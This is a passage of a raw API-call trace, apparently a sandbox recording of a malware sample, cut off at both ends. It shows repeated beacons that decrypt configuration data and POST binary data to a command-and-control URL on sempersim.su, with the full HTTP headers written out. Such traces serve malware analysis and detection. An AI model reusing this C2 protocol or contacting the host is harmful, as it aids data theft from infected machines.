(lpLibFileName="shlwapi") returned 0x74df0000 [0243.829] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0243.830] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0243.831] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.831] GetProcessHeap () returned 0x620000 [0243.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0243.831] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.831] GetProcessHeap () returned 0x620000 [0243.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0243.832] GetProcessHeap () returned 0x620000 [0243.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0243.832] GetProcessHeap () returned 0x620000 [0243.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0243.832] GetProcessHeap () returned 0x620000 [0243.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0243.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.833] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.884] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0243.890] GetProcessHeap () returned 0x620000 [0243.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0243.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.891] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0243.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.892] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.893] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.893] GetProcessHeap () returned 0x620000 [0243.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0243.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.894] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0243.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.895] CryptDestroyKey (hKey=0x62d710) returned 1 [0243.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0243.895] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0243.895] GetProcessHeap () returned 0x620000 [0243.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0243.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0243.896] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0243.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0243.897] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0243.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0243.898] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0243.898] GetProcessHeap () returned 0x620000 [0243.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0243.898] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0243.899] GetProcessHeap () returned 0x620000 [0243.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b640 [0243.899] socket (af=2, type=1, protocol=6) returned 0x3c4 [0243.899] connect (s=0x3c4, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0243.951] FreeAddrInfoW (pAddrInfo=0x63c118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0243.951] GetProcessHeap () returned 0x620000 [0243.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0243.951] GetProcessHeap () returned 0x620000 [0243.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x647d48 [0243.951] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0243.952] wvsprintfA (in: param_1=0x647d48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0243.952] GetProcessHeap () returned 0x620000 [0243.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0243.952] GetProcessHeap () returned 0x620000 [0243.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x647d48 | out: hHeap=0x620000) returned 1 [0243.952] GetProcessHeap () returned 0x620000 [0243.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642dc8 [0243.953] GetProcessHeap () returned 0x620000 [0243.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x647d48 [0243.953] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0243.954] wvsprintfA (in: param_1=0x647d48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0243.954] GetProcessHeap () returned 0x620000 [0243.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0243.954] GetProcessHeap () returned 0x620000 [0243.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x647d48 | out: hHeap=0x620000) returned 1 [0243.954] send (s=0x3c4, buf=0x63a880*, len=237, flags=0) returned 237 [0243.955] send (s=0x3c4, buf=0x6421e0*, len=159, flags=0) returned 159 [0243.955] GetProcessHeap () returned 0x620000 [0243.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x647d48 [0243.955] recv (in: s=0x3c4, buf=0x647d48, len=4048, flags=0 | out: buf=0x647d48*) returned 237 [0244.686] GetProcessHeap () returned 0x620000 [0244.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0244.687] GetProcessHeap () returned 0x620000 [0244.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0244.687] GetProcessHeap () returned 0x620000 [0244.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0244.688] GetProcessHeap () returned 0x620000 [0244.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0244.688] closesocket (s=0x3c4) returned 0 [0244.689] GetProcessHeap () returned 0x620000 [0244.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b640 | out: hHeap=0x620000) returned 1 [0244.689] GetProcessHeap () returned 0x620000 [0244.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0244.689] GetProcessHeap () returned 0x620000 [0244.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0244.690] GetProcessHeap () returned 0x620000 [0244.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0244.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x647d48, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x810) returned 0x3c4 [0244.692] Sleep (dwMilliseconds=0xea60) [0244.698] GetProcessHeap () returned 0x620000 [0244.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0244.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.699] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0244.715] GetProcessHeap () returned 0x620000 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0244.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.716] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0244.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.717] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.719] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.719] GetProcessHeap () returned 0x620000 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0244.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.720] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0244.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.721] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0244.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.722] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0244.722] GetProcessHeap () returned 0x620000 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0244.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0244.723] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0244.724] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0244.725] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0244.726] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.726] GetProcessHeap () returned 0x620000 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0244.727] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.727] GetProcessHeap () returned 0x620000 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0244.727] GetProcessHeap () returned 0x620000 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0244.727] GetProcessHeap () returned 0x620000 [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0244.728] GetProcessHeap () returned 0x620000 [0244.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643008 [0244.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.729] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.737] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0244.747] GetProcessHeap () returned 0x620000 [0244.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0244.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.748] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0244.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.749] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.750] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.750] GetProcessHeap () returned 0x620000 [0244.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0244.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.751] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643008, pdwDataLen=0x19fcfc | out: pbData=0x643008, pdwDataLen=0x19fcfc) returned 1 [0244.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.752] CryptDestroyKey (hKey=0x62d190) returned 1 [0244.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0244.753] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0244.753] GetProcessHeap () returned 0x620000 [0244.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646320 [0244.754] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0244.754] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0244.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0244.756] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0244.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0244.757] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0244.757] GetProcessHeap () returned 0x620000 [0244.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0244.757] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c410*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0244.758] GetProcessHeap () returned 0x620000 [0244.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4f0 [0244.758] socket (af=2, type=1, protocol=6) returned 0x3c8 [0244.759] connect (s=0x3c8, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0244.811] FreeAddrInfoW (pAddrInfo=0x63c410*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0244.811] GetProcessHeap () returned 0x620000 [0244.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0244.811] GetProcessHeap () returned 0x620000 [0244.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0244.812] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0244.813] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0244.813] GetProcessHeap () returned 0x620000 [0244.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0244.813] GetProcessHeap () returned 0x620000 [0244.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0244.814] GetProcessHeap () returned 0x620000 [0244.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0244.814] GetProcessHeap () returned 0x620000 [0244.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0244.815] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0244.816] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0244.816] GetProcessHeap () returned 0x620000 [0244.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0244.817] GetProcessHeap () returned 0x620000 [0244.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0244.817] send (s=0x3c8, buf=0x63a880*, len=237, flags=0) returned 237 [0244.818] send (s=0x3c8, buf=0x6421e0*, len=159, flags=0) returned 159 [0244.818] GetProcessHeap () returned 0x620000 [0244.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0244.818] recv (in: s=0x3c8, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0246.585] GetProcessHeap () returned 0x620000 [0246.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0246.585] GetProcessHeap () returned 0x620000 [0246.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0246.586] GetProcessHeap () returned 0x620000 [0246.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0246.586] GetProcessHeap () returned 0x620000 [0246.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0246.587] closesocket (s=0x3c8) returned 0 [0246.587] GetProcessHeap () returned 0x620000 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4f0 | out: hHeap=0x620000) returned 1 [0246.587] GetProcessHeap () returned 0x620000 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646320 | out: hHeap=0x620000) returned 1 [0246.588] GetProcessHeap () returned 0x620000 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643008 | out: hHeap=0x620000) returned 1 [0246.588] GetProcessHeap () returned 0x620000 [0246.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0246.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5cc) returned 0x3c8 [0246.591] Sleep (dwMilliseconds=0xea60) [0246.604] GetProcessHeap () returned 0x620000 [0246.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435f0 [0246.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.605] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.614] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0246.625] GetProcessHeap () returned 0x620000 [0246.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0246.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.626] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0246.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.627] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.628] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.628] GetProcessHeap () returned 0x620000 [0246.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0246.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.630] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435f0, pdwDataLen=0x19fcfc | out: pbData=0x6435f0, pdwDataLen=0x19fcfc) returned 1 [0246.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.631] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0246.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.632] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0246.632] GetProcessHeap () returned 0x620000 [0246.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6460f8 [0246.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0246.633] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0246.634] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0246.635] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0246.639] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.639] GetProcessHeap () returned 0x620000 [0246.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0246.640] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.640] 